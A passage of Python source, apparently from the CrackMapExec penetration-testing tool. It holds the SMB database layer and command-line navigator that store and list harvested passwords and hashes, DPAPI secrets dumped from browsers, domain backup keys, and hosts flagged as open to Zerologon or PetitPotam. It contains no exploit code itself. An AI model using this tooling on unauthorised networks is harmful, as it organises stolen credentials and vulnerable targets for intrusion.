q.filter(self.HostsTable.c.signing == False)\n elif filter_term == \"spooler\":\n q = q.filter(self.HostsTable.c.spooler == True)\n elif filter_term == \"zerologon\":\n q = q.filter(self.HostsTable.c.zerologon == True)\n elif filter_term == \"petitpotam\":\n q = q.filter(self.HostsTable.c.petitpotam == True)\n elif filter_term is not None and filter_term.startswith(\"domain\"):\n domain = filter_term.split()[1]\n like_term = func.lower(f\"%{domain}%\")\n q = q.filter(self.HostsTable.c.domain.like(like_term))\n # if we're filtering by ip/hostname\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))\n results = self.conn.execute(q).all()\n cme_logger.debug(f\"smb hosts() - results: {results}\")\n return results\n\n def is_group_valid(self, group_id):\n \"\"\"\n Check if this group ID is valid.\n \"\"\"\n q = select(self.GroupsTable).filter(self.GroupsTable.c.id == group_id)\n results = self.conn.execute(q).first()\n\n valid = True if results else False\n cme_logger.debug(f\"is_group_valid(groupID={group_id}) => {valid}\")\n\n return valid\n\n def add_group(self, domain, name, rid=None, member_count_ad=None):\n results = self.get_groups(group_name=name, group_domain=domain)\n\n groups = []\n updated_ids = []\n\n group_data = {\n \"domain\": domain,\n \"name\": name,\n \"rid\": rid,\n \"member_count_ad\": member_count_ad,\n \"last_query_time\": None,\n }\n\n if not results:\n if member_count_ad is not None:\n group_data[\"member_count_ad\"] = member_count_ad\n today = datetime.now()\n iso_date = today.isoformat()\n group_data[\"last_query_time\"] = iso_date\n groups = [group_data]\n\n # insert the group and get the returned id right away, this can be refactored when we can use RETURNING\n q = Insert(self.GroupsTable)\n\n self.conn.execute(q, groups)\n new_group_data = self.get_groups(group_name=group_data[\"name\"], group_domain=group_data[\"domain\"])\n returned_id = [new_group_data[0].id]\n cme_logger.debug(f\"Inserted group with ID: {returned_id[0]}\")\n return returned_id\n else:\n for group in results:\n g_data = group._asdict()\n if domain is not None:\n g_data[\"domain\"] = domain\n if name is not None:\n g_data[\"name\"] = name\n if rid is not None:\n g_data[\"rid\"] = rid\n if member_count_ad is not None:\n g_data[\"member_count_ad\"] = member_count_ad\n today = datetime.now()\n iso_date = today.isoformat()\n g_data[\"last_query_time\"] = iso_date\n # only add it to the upsert query if it's changed to save query execution time\n if g_data not in groups:\n groups.append(g_data)\n updated_ids.append(g_data[\"id\"])\n\n cme_logger.debug(f\"Update Groups: {groups}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.GroupsTable) # .returning(self.GroupsTable.c.id)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(index_elements=self.GroupsTable.primary_key, set_=update_columns)\n\n self.conn.execute(q, groups)\n # TODO: always return a list and fix code references to not expect a single integer\n # inserted_result = res_inserted_result.first()\n # gid = inserted_result.id\n #\n # logger.debug(f\"inserted_results: {inserted_result}\\ntype: {type(inserted_result)}\")\n # logger.debug('add_group(domain={}, name={}) => {}'.format(domain, name, gid))\n if updated_ids:\n cme_logger.debug(f\"Updated groups with IDs: {updated_ids}\")\n return updated_ids\n\n def get_groups(self, filter_term=None, group_name=None, group_domain=None):\n \"\"\"\n Return groups from the database\n \"\"\"\n\n if filter_term and self.is_group_valid(filter_term):\n q = select(self.GroupsTable).filter(self.GroupsTable.c.id == filter_term)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n elif group_name and group_domain:\n q = select(self.GroupsTable).filter(\n func.lower(self.GroupsTable.c.name) == func.lower(group_name),\n func.lower(self.GroupsTable.c.domain) == func.lower(group_domain),\n )\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.GroupsTable).filter(self.GroupsTable.c.name.like(like_term))\n else:\n q = select(self.GroupsTable).filter()\n\n results = self.conn.execute(q).all()\n\n cme_logger.debug(f\"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}\")\n return results\n\n def get_group_relations(self, user_id=None, group_id=None):\n if user_id and group_id:\n q = select(self.GroupRelationsTable).filter(\n self.GroupRelationsTable.c.id == user_id,\n self.GroupRelationsTable.c.groupid == group_id,\n )\n elif user_id:\n q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.id == user_id)\n elif group_id:\n q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.groupid == group_id)\n\n results = self.conn.execute(q).all()\n return results\n\n def remove_group_relations(self, user_id=None, group_id=None):\n q = delete(self.GroupRelationsTable)\n if user_id:\n q = q.filter(self.GroupRelationsTable.c.userid == user_id)\n elif group_id:\n q = q.filter(self.GroupRelationsTable.c.groupid == group_id)\n self.conn.execute(q)\n\n def is_user_valid(self, user_id):\n \"\"\"\n Check if this User ID is valid.\n \"\"\"\n q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_users(self, filter_term=None):\n q = select(self.UsersTable)\n\n if self.is_user_valid(filter_term):\n q = q.filter(self.UsersTable.c.id == filter_term)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(func.lower(self.UsersTable.c.username).like(like_term))\n results = self.conn.execute(q).all()\n return results\n\n def get_user(self, domain, username):\n q = select(self.UsersTable).filter(\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n )\n results = self.conn.execute(q).all()\n return results\n\n def get_domain_controllers(self, domain=None):\n return self.get_hosts(filter_term=\"dc\", domain=domain)\n\n def is_share_valid(self, share_id):\n \"\"\"\n Check if this share ID is valid.\n \"\"\"\n q = select(self.SharesTable).filter(self.SharesTable.c.id == share_id)\n results = self.conn.execute(q).all()\n\n cme_logger.debug(f\"is_share_valid(shareID={share_id}) => {len(results) > 0}\")\n return len(results) > 0\n\n def add_share(self, host_id, user_id, name, remark, read, write):\n share_data = {\n \"hostid\": host_id,\n \"userid\": user_id,\n \"name\": name,\n \"remark\": remark,\n \"read\": read,\n \"write\": write,\n }\n share_id = self.conn.execute(\n Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id),\n share_data,\n ) # .scalar_one()\n # return share_id\n\n def get_shares(self, filter_term=None):\n if self.is_share_valid(filter_term):\n q = select(self.SharesTable).filter(self.SharesTable.c.id == filter_term)\n elif filter_term:\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.SharesTable).filter(self.SharesTable.c.name.like(like_term))\n else:\n q = select(self.SharesTable)\n results = self.conn.execute(q).all()\n return results\n\n def get_shares_by_access(self, permissions, share_id=None):\n permissions = permissions.lower()\n q = select(self.SharesTable)\n if share_id:\n q = q.filter(self.SharesTable.c.id == share_id)\n if \"r\" in permissions:\n q = q.filter(self.SharesTable.c.read == 1)\n if \"w\" in permissions:\n q = q.filter(self.SharesTable.c.write == 1)\n results = self.conn.execute(q).all()\n return results\n\n def get_users_with_share_access(self, host_id, share_name, permissions):\n permissions = permissions.lower()\n q = select(self.SharesTable.c.userid).filter(self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id)\n if \"r\" in permissions:\n q = q.filter(self.SharesTable.c.read == 1)\n if \"w\" in permissions:\n q = q.filter(self.SharesTable.c.write == 1)\n results = self.conn.execute(q).all()\n\n return results\n\n def add_domain_backupkey(self, domain: str, pvk: bytes):\n \"\"\"\n Add domain backupkey\n :domain is the domain fqdn\n :pvk is the domain backupkey\n \"\"\"\n q = select(self.DpapiBackupkey).filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain))\n results = self.conn.execute(q).all()\n\n if not len(results):\n pvk_encoded = base64.b64encode(pvk)\n backup_key = {\"domain\": domain, \"pvk\": pvk_encoded}\n try:\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.DpapiBackupkey) # .returning(self.DpapiBackupkey.c.id)\n\n self.conn.execute(q, [backup_key]) # .scalar()\n cme_logger.debug(f\"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})\")\n # return inserted_id\n except Exception as e:\n cme_logger.debug(f\"Issue while inserting DPAPI Backup Key: {e}\")\n\n def get_domain_backupkey(self, domain: str = None):\n \"\"\"\n Get domain backupkey\n :domain is the domain fqdn\n \"\"\"\n q = select(self.DpapiBackupkey)\n if domain is not None:\n q = q.filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain))\n results = self.conn.execute(q).all()\n\n cme_logger.debug(f\"get_domain_backupkey(domain={domain}) => {results}\")\n\n if len(results) > 0:\n results = [(id_key, domain, base64.b64decode(pvk)) for id_key, domain, pvk in results]\n return results\n\n def is_dpapi_secret_valid(self, dpapi_secret_id):\n \"\"\"\n Check if this group ID is valid.\n :dpapi_secret_id is a primary id\n \"\"\"\n q = select(self.DpapiSecrets).filter(func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id)\n results = self.conn.execute(q).first()\n valid = True if results is not None else False\n cme_logger.debug(f\"is_dpapi_secret_valid(groupID={dpapi_secret_id}) => {valid}\")\n return valid\n\n def add_dpapi_secrets(\n self,\n host: str,\n dpapi_type: str,\n windows_user: str,\n username: str,\n password: str,\n url: str = \"\",\n ):\n \"\"\"\n Add dpapi secrets to cmedb\n \"\"\"\n secret = {\n \"host\": host,\n \"dpapi_type\": dpapi_type,\n \"windows_user\": windows_user,\n \"username\": username,\n \"password\": password,\n \"url\": url,\n }\n q = Insert(self.DpapiSecrets).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id)\n\n self.conn.execute(q, [secret]) # .scalar()\n\n # inserted_result = res_inserted_result.first()\n # inserted_id = inserted_result.id\n\n cme_logger.debug(f\"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})\")\n\n def get_dpapi_secrets(\n self,\n filter_term=None,\n host: str = None,\n dpapi_type: str = None,\n windows_user: str = None,\n username: str = None,\n url: str = None,\n ):\n \"\"\"\n Get dpapi secrets from cmedb\n \"\"\"\n q = select(self.DpapiSecrets)\n\n if self.is_dpapi_secret_valid(filter_term):\n q = q.filter(self.DpapiSecrets.c.id == filter_term)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n elif host:\n q = q.filter(self.DpapiSecrets.c.host == host)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n elif dpapi_type:\n q = q.filter(func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type))\n elif windows_user:\n like_term = func.lower(f\"%{windows_user}%\")\n q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term))\n elif username:\n like_term = func.lower(f\"%{username}%\")\n q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term))\n elif url:\n q = q.filter(func.lower(self.DpapiSecrets.c.url) == func.lower(url))\n results = self.conn.execute(q).all()\n\n cme_logger.debug(f\"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}\")\n return results\n\n def add_loggedin_relation(self, user_id, host_id):\n relation_query = select(self.LoggedinRelationsTable).filter(\n self.LoggedinRelationsTable.c.userid == user_id,\n self.LoggedinRelationsTable.c.hostid == host_id,\n )\n results = self.conn.execute(relation_query).all()\n\n # only add one if one doesn't already exist\n if not results:\n relation = {\"userid\": user_id, \"hostid\": host_id}\n try:\n cme_logger.debug(f\"Inserting loggedin_relations: {relation}\")\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n\n self.conn.execute(q, [relation]) # .scalar()\n inserted_id_results = self.get_loggedin_relations(user_id, host_id)\n cme_logger.debug(f\"Checking if relation was added: {inserted_id_results}\")\n return inserted_id_results[0].id\n except Exception as e:\n cme_logger.debug(f\"Error inserting LoggedinRelation: {e}\")\n\n def get_loggedin_relations(self, user_id=None, host_id=None):\n q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n if user_id:\n q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)\n if host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n results = self.conn.execute(q).all()\n return results\n\n def remove_loggedin_relations(self, user_id=None, host_id=None):\n q = delete(self.LoggedinRelationsTable)\n if user_id:\n q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)\n elif host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n self.conn.execute(q)\n\n def get_checks(self):\n q = select(self.ConfChecksTable)\n return self.conn.execute(q).all()\n \n def get_check_results(self):\n q = select(self.ConfChecksResultsTable)\n return self.conn.execute(q).all()\n \n def insert_data(self, table, select_results=[], **new_row):\n \"\"\"\n Insert a new row in the given table.\n Basically it's just a more generic version of add_host\n \"\"\"\n results = []\n updated_ids = []\n\n # Create new row\n if not select_results:\n results = [new_row]\n # Update existing row data\n else:\n for row in select_results:\n row_data = row._asdict()\n for column,value in new_row.items():\n row_data[column] = value\n\n # Only add data to be updated if it has changed\n if row_data not in results:\n results.append(row_data)\n updated_ids.append(row_data['id'])\n\n cme_logger.debug(f'Update data: {results}')\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(table) # .returning(table.c.id)\n update_column = {col.name: col for col in q.excluded if col.name not in 'id'}\n q = q.on_conflict_do_update(index_elements=table.primary_key, set_=update_column)\n self.conn.execute(q, results) # .scalar()\n # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted\n return updated_ids\n\n def add_check(self, name, description):\n \"\"\"\n Check if this check item has already been added to the database, if not, add it in.\n \"\"\"\n q = select(self.ConfChecksTable).filter(self.ConfChecksTable.c.name == name)\n select_results = self.conn.execute(q).all()\n context = locals()\n new_row = dict(((column, context[column]) for column in ('name', 'description')))\n updated_ids = self.insert_data(self.ConfChecksTable, select_results, **new_row)\n\n if updated_ids:\n cme_logger.debug(f\"add_check() - Checks IDs Updated: {updated_ids}\")\n return updated_ids\n\n def add_check_result(self, host_id, check_id, secure, reasons):\n \"\"\"\n Check if this check result has already been added to the database, if not, add it in.\n \"\"\"\n q = select(self.ConfChecksResultsTable).filter(self.ConfChecksResultsTable.c.host_id == host_id, self.ConfChecksResultsTable.c.check_id == check_id)\n select_results = self.conn.execute(q).all()\n context = locals()\n new_row = dict(((column, context[column]) for column in ('host_id', 'check_id', 'secure', 'reasons')))\n updated_ids = self.insert_data(self.ConfChecksResultsTable, select_results, **new_row)\n\n if updated_ids:\n cme_logger.debug(f\"add_check_result() - Check Results IDs Updated: {updated_ids}\")\n return updated_ids\n" }, { "path": "cme/protocols/smb/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\nfrom termcolor import colored\nimport functools\n\nhelp_header = functools.partial(colored, color='cyan', attrs=['bold'])\nhelp_kw = functools.partial(colored, color='green', attrs=['bold'])\n\nclass navigator(DatabaseNavigator):\n def display_creds(self, creds):\n data = [[\"CredID\", \"Admin On\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n\n for cred in creds:\n cred_id = cred[0]\n domain = cred[1]\n username = cred[2]\n password = cred[3]\n credtype = cred[4]\n # pillaged_from = cred[5]\n\n links = self.db.get_admin_relations(user_id=cred_id)\n data.append(\n [\n cred_id,\n str(len(links)) + \" Host(s)\",\n credtype,\n domain,\n username,\n password,\n ]\n )\n print_table(data, title=\"Credentials\")\n\n def display_groups(self, groups):\n data = [\n [\n \"GroupID\",\n \"Domain\",\n \"Name\",\n \"RID\",\n \"Enumerated Members\",\n \"AD Members\",\n \"Last Query Time\",\n ]\n ]\n\n for group in groups:\n group_id = group[0]\n domain = group[1]\n name = group[2]\n rid = group[3]\n members = len(self.db.get_group_relations(group_id=group_id))\n ad_members = group[4]\n last_query_time = group[5]\n data.append([group_id, domain, name, rid, members, ad_members, last_query_time])\n print_table(data, title=\"Groups\")\n\n # pull/545\n def display_hosts(self, hosts):\n data = [\n [\n \"HostID\",\n \"Admins\",\n \"IP\",\n \"Hostname\",\n \"Domain\",\n \"OS\",\n \"SMBv1\",\n \"Signing\",\n \"Spooler\",\n \"Zerologon\",\n \"PetitPotam\",\n ]\n ]\n\n for host in hosts:\n host_id = host[0]\n ip = host[1]\n hostname = host[2]\n domain = host[3]\n\n try:\n os = host[4].decode()\n except:\n os = host[4]\n try:\n smbv1 = host[6]\n signing = host[7]\n except IndexError:\n smbv1 = \"\"\n signing = \"\"\n try:\n spooler = host[8]\n zerologon = host[9]\n petitpotam = host[10]\n except IndexError:\n spooler = \"\"\n zerologon = \"\"\n petitpotam = \"\"\n\n links = self.db.get_admin_relations(host_id=host_id)\n data.append(\n [\n host_id,\n str(len(links)) + \" Cred(s)\",\n ip,\n hostname,\n domain,\n os,\n smbv1,\n signing,\n spooler,\n zerologon,\n petitpotam,\n ]\n )\n print_table(data, title=\"Hosts\")\n\n def display_shares(self, shares):\n data = [[\"ShareID\", \"host\", \"Name\", \"Remark\", \"Read Access\", \"Write Access\"]]\n\n for share in shares:\n share_id = share[0]\n host_id = share[1]\n name = share[3]\n remark = share[4]\n\n users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions=\"r\")\n users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions=\"w\")\n data.append(\n [\n share_id,\n host_id,\n name,\n remark,\n f\"{len(users_r_access)} User(s)\",\n f\"{len(users_w_access)} Users\",\n ]\n )\n print_table(data)\n\n def do_shares(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n shares = self.db.get_shares()\n self.display_shares(shares)\n elif filter_term in [\"r\", \"w\", \"rw\"]:\n shares = self.db.get_shares_by_access(line)\n self.display_shares(shares)\n else:\n shares = self.db.get_shares(filter_term=filter_term)\n\n if len(shares) > 1:\n self.display_shares(shares)\n elif len(shares) == 1:\n share = shares[0]\n share_id = share[0]\n host_id = share[1]\n name = share[3]\n remark = share[4]\n\n users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions=\"r\")\n users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions=\"w\")\n\n data = [[\"ShareID\", \"Name\", \"Remark\"], [share_id, name, remark]]\n print_table(data, title=\"Share\")\n host = self.db.get_hosts(filter_term=host_id)[0]\n data = [\n [\"HostID\", \"IP\", \"Hostname\", \"Domain\", \"OS\", \"DC\"],\n [host[0], host[1], host[2], host[3], host[4], host[5]],\n ]\n\n print_table(data, title=\"Share Location\")\n\n if users_r_access:\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n for user in users_r_access:\n userid = user[0]\n creds = self.db.get_credentials(filter_term=userid)\n\n for cred in creds:\n data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])\n print_table(data, title=\"Users(s) with Read Access\")\n\n if users_w_access:\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n for user in users_w_access:\n userid = user[0]\n creds = self.db.get_credentials(filter_term=userid)\n\n for cred in creds:\n data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])\n print_table(data, title=\"Users(s) with Write Access\")\n\n def help_shares(self):\n help_string = \"\"\"\n shares [filter_term]\n By default prints all shares\n Can use a filter term to filter shares\n \"\"\"\n print_help(help_string)\n\n def do_groups(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n groups = self.db.get_groups()\n self.display_groups(groups)\n else:\n groups = self.db.get_groups(filter_term=filter_term)\n\n if len(groups) > 1:\n self.display_groups(groups)\n elif len(groups) == 1:\n data = [\n [\n \"GroupID\",\n \"Domain\",\n \"Name\",\n \"RID\",\n \"Enumerated Members\",\n \"AD Members\",\n \"Last Query Time\",\n ]\n ]\n\n for group in groups:\n data.append(\n [\n group[0],\n group[1],\n group[2],\n group[3],\n len(self.db.get_group_relations(group_id=group[0])),\n group[4],\n group[5],\n ]\n )\n print_table(data, title=\"Group\")\n data = [\n [\n \"CredID\",\n \"CredType\",\n \"Pillaged From HostID\",\n \"Domain\",\n \"UserName\",\n \"Password\",\n ]\n ]\n\n for group in groups:\n members = self.db.get_group_relations(group_id=group[0])\n\n for member in members:\n _, userid, _ = member\n creds = self.db.get_credentials(filter_term=userid)\n\n for cred in creds:\n data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]])\n print_table(data, title=\"Member(s)\")\n\n def help_groups(self):\n help_string = \"\"\"\n groups [filter_term]\n By default prints all groups\n Can use a filter term to filter groups\n \"\"\"\n print_help(help_string)\n\n def do_hosts(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n hosts = self.db.get_hosts()\n self.display_hosts(hosts)\n else:\n hosts = self.db.get_hosts(filter_term=filter_term)\n\n if len(hosts) > 1:\n self.display_hosts(hosts)\n elif len(hosts) == 1:\n data = [\n [\n \"HostID\",\n \"IP\",\n \"Hostname\",\n \"Domain\",\n \"OS\",\n \"DC\",\n \"SMBv1\",\n \"Signing\",\n \"Spooler\",\n \"Zerologon\",\n \"PetitPotam\",\n ]\n ]\n host_id_list = []\n\n for host in hosts:\n host_id = host[0]\n host_id_list.append(host_id)\n ip = host[1]\n hostname = host[2]\n domain = host[3]\n\n try:\n os = host[4].decode()\n except:\n os = host[4]\n try:\n dc = host[5]\n except IndexError:\n dc = \"\"\n try:\n smbv1 = host[6]\n signing = host[7]\n except IndexError:\n smbv1 = \"\"\n signing = \"\"\n try:\n spooler = host[8]\n zerologon = host[9]\n petitpotam = host[10]\n except IndexError:\n spooler = \"\"\n zerologon = \"\"\n petitpotam = \"\"\n\n data.append(\n [\n host_id,\n ip,\n hostname,\n domain,\n os,\n dc,\n smbv1,\n signing,\n spooler,\n zerologon,\n petitpotam,\n ]\n )\n print_table(data, title=\"Host\")\n\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n for host_id in host_id_list:\n links = self.db.get_admin_relations(host_id=host_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n creds = self.db.get_credentials(filter_term=cred_id)\n\n for cred in creds:\n data.append([cred[0], cred[4], cred[1], cred[2], cred[3]])\n\n print_table(data, title=\"Credential(s) with Admin Access\")\n\n def do_wcc(self, line):\n valid_columns = {\n 'ip':'IP',\n 'hostname':'Hostname',\n 'check':'Check',\n 'description':'Description',\n 'status':'Status',\n 'reasons':'Reasons'\n }\n\n line = line.strip()\n\n if line.lower() == 'full':\n columns_to_display = list(valid_columns.values())\n else:\n requested_columns = line.split(' ')\n columns_to_display = list(valid_columns[column.lower()] for column in requested_columns if column.lower() in valid_columns)\n\n results = self.db.get_check_results()\n self.display_wcc_results(results, columns_to_display)\n\n def display_wcc_results(self, results, columns_to_display=None):\n data = [\n [\n \"IP\",\n \"Hostname\",\n \"Check\",\n \"Status\"\n ]\n ]\n if columns_to_display:\n data = [columns_to_display]\n\n checks = self.db.get_checks()\n checks_dict = {}\n for check in checks:\n check = check._asdict()\n checks_dict[check['id']] = check\n\n for (result_id, host_id, check_id, secure, reasons) in results:\n status = 'OK' if secure else 'KO'\n host = self.db.get_hosts(host_id)[0]._asdict()\n check = checks_dict[check_id]\n row = []\n for column in data[0]:\n if column == 'IP':\n row.append(host['ip'])\n if column == 'Hostname':\n row.append(host['hostname'])\n if column == 'Check':\n row.append(check['name'])\n if column == 'Description':\n row.append(check['description'])\n if column == 'Status':\n row.append(status)\n if column == 'Reasons':\n row.append(reasons)\n data.append(row)\n\n print_table(data, title=\"Windows Configuration Checks\")\n\n def help_wcc(self):\n help_string = f\"\"\"\n {help_header('USAGE')}\n {help_header('wcc')} [{help_kw('full')}]\n {help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...\n\n {help_header('DESCRIPTION')}\n Display Windows Configuration Checks results\n\n {help_header('wcc')} [{help_kw('full')}]\n If full is provided, display all columns. Otherwise, display IP, Hostname, Check and Status\n\n {help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...\n Display only the requested columns (case-insensitive)\n \"\"\"\n print_help(help_string)\n\n def help_hosts(self):\n help_string = \"\"\"\n hosts [dc|spooler|zerologon|petitpotam|filter_term]\n By default prints all hosts\n Table format:\n | 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |\n Subcommands:\n dc - list all domain controllers\n spooler - list all hosts with Spooler service enabled\n zerologon - list all hosts vulnerable to zerologon\n petitpotam - list all hosts vulnerable to petitpotam\n filter_term - filters hosts with filter_term\n If a single host is returned (e.g. `hosts 15`, it prints the following tables:\n Host | 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |\n Credential(s) with Admin Access | 'CredID', 'CredType', 'Domain', 'UserName', 'Password' |\n Otherwise, it prints the default host table from a `like` query on the `ip` and `hostname` columns\n \"\"\"\n print_help(help_string)\n\n def do_dpapi(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n secrets = self.db.get_dpapi_secrets()\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"browser\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"MSEDGE\")\n secrets += self.db.get_dpapi_secrets(dpapi_type=\"GOOGLE CHROME\")\n secrets += self.db.get_dpapi_secrets(dpapi_type=\"IEX\")\n secrets += self.db.get_dpapi_secrets(dpapi_type=\"FIREFOX\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"chrome\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"GOOGLE CHROME\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"msedge\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"MSEDGE\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"credentials\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"CREDENTIAL\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"iex\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"IEX\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n elif filter_term.split()[0].lower() == \"firefox\":\n secrets = self.db.get_dpapi_secrets(dpapi_type=\"FIREFOX\")\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n else:\n secrets = self.db.get_dpapi_secrets(filter_term=filter_term)\n if len(secrets) > 0:\n secrets.insert(\n 0,\n [\n \"ID\",\n \"Host\",\n \"DPAPI Type\",\n \"Windows User\",\n \"Username\",\n \"Password\",\n \"URL\",\n ],\n )\n print_table(secrets, title=\"DPAPI Secrets\")\n\n def help_dpapi(self):\n help_string = \"\"\"\n dpapi [browser|chrome|msedge|credentials|iex|firefox|filter_term]\n By default prints all dpapi dumped secrets\n Table format:\n | 'ID', 'Host', 'DPAPI Type', 'Windows User', 'Username', 'Password', 'URL' |\n Subcommands:\n browser - list all secrets dumped from browser\n chrome - list all secrets dumped from chrome\n msedge - list all secrets dumped from microsoft edge\n credentials - list all secrets dumped from credential manager (user and system)\n iex - list all secrets dumped from Internet Explorer\n firefox - list all secrets dumped from Firefox\n filter_term - filters dpapi secrets with filter_term\n \"\"\"\n print_help(help_string)\n\n def do_creds(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n creds = self.db.get_credentials()\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"add\":\n # add format: \"domain username password \n args = filter_term.split()[1:]\n\n if len(args) == 3:\n domain, username, password = args\n if validate_ntlm(password):\n self.db.add_credential(\"hash\", domain, username, password)\n else:\n self.db.add_credential(\"plaintext\", domain, username, password)\n else:\n print(\"[!] Format is 'add domain username password\")\n return\n elif filter_term.split()[0].lower() == \"remove\":\n args = filter_term.split()[1:]\n if len(args) != 1:\n print(\"[!] Format is 'remove '\")\n return\n else:\n self.db.remove_credentials(args)\n self.db.remove_admin_relation(user_ids=args)\n elif filter_term.split()[0].lower() == \"plaintext\":\n creds = 